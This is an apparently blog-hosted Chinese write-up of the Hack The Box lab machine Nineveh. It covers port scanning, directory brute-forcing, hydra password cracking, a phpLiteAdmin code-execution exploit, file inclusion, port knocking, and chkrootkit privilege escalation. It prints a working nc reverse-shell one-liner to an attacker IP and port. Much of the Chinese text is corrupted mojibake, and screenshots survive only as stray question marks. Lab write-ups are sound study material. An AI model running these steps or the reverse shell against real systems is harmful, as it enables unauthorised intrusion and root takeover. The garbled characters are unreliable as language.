信息收集：

nmap -p- -sT --min-rate=10000 -Pn 10.129.26.243

nmap -p- -sU --min-rate=10000 -Pn 10.129.26.243

nmap -p80,443 -sT -sV -sC -O -Pn 10.129.26.243

發(fā)現(xiàn)域名nineveh.htb加入hosts文件中，因?yàn)橹挥?0,443端口開放訪問，只好從web端入手了

將圖片下載后，分析了一下沒有其他信息與隱寫

?

?

沒有什么漏洞點(diǎn)，就先爆破子域名與目錄掃描

利用dirsearch目錄掃描http://nineveh.htb ，發(fā)現(xiàn)了info.php這個(gè)文件，訪問后發(fā)現(xiàn)其實(shí)是phpinfo

?dirsearch掃描https://nineveh.htb后發(fā)現(xiàn)了/db/目錄

?訪問后發(fā)現(xiàn)是phpliteadmin v1.9的登陸界面，利用searchsploit搜索歷史漏洞

目前只知道是v1.9版本，具體的版本號(hào)不清楚，都嘗試一下，嘗試后發(fā)現(xiàn)，漏洞都是需要先進(jìn)入后臺(tái)才能觸發(fā)的，依舊沒有什么思路的收獲，只好再嘗試目錄掃描，看看有沒有什么遺漏的目錄

利用feroxbuster掃描出了一個(gè)新的目錄

?訪問后發(fā)現(xiàn)是一個(gè)新的登陸界面

?查看一下源代碼，似乎存在admin賬戶，并且可能跟數(shù)據(jù)庫(kù)有關(guān)

目前沒有其他的信息了，只能采用最簡(jiǎn)單的方式，利用hydra進(jìn)行密碼爆破

?成功爆破出密碼

登陸后發(fā)現(xiàn)沒有什么可以利用的信息

繼續(xù)嘗試爆破phpliteadmin的密碼

成功爆破出密碼password123

?利用爆出的密碼登陸后臺(tái)

?之前searchsploit發(fā)現(xiàn)了一個(gè)遠(yuǎn)程代碼執(zhí)行漏洞

成功寫入shell,但是現(xiàn)在又發(fā)現(xiàn)了另一個(gè)困難，寫入了shell，此時(shí)需要一個(gè)文件包含的接口，否則我無法利用寫入的shell，這里有shell的絕對(duì)路徑/var/tmp/shell.php?

?

找了好久之后，在第一次進(jìn)入的管理后臺(tái)發(fā)現(xiàn)了文件包含的接口

成功包含了shell.php,反彈shell成功，成功拿到立足點(diǎn)

?

?在/var/www/ssl/secure_notes下發(fā)現(xiàn)了一個(gè)圖片，遠(yuǎn)程加載下來

?在圖片里發(fā)現(xiàn)了隱寫的內(nèi)容有ssh 的私鑰與公鑰，但是在之前掃描端口時(shí)，并沒有發(fā)現(xiàn)22端口開放

?查看了一下配置文件 /etc/knockd.conf，發(fā)現(xiàn)需要在5s內(nèi)訪問571,290,911才能開啟22端口

依次訪問571,290,911

?

?利用密匙成功連接ssh

?通過查看權(quán)限發(fā)現(xiàn)report目錄，對(duì)應(yīng)當(dāng)前用戶的權(quán)限

?仔細(xì)檢查了一下內(nèi)容，這個(gè)似乎是可以檢查rootkit后門

檢查了一下正常運(yùn)行的程序，發(fā)現(xiàn)chkrootkit正在運(yùn)行中

?chkrootkit存在本地提權(quán)漏洞，將文件寫入后，當(dāng)chkrootkit掃描到會(huì)以root權(quán)限去嘗試運(yùn)行

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.20 4455 >/tmp/f" > update

過一會(huì)兒后，成功接收到root權(quán)限的反彈shell

?

?

?

?

總結(jié)

以上是生活随笔為你收集整理的HTB打靶日记：Nineveh的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。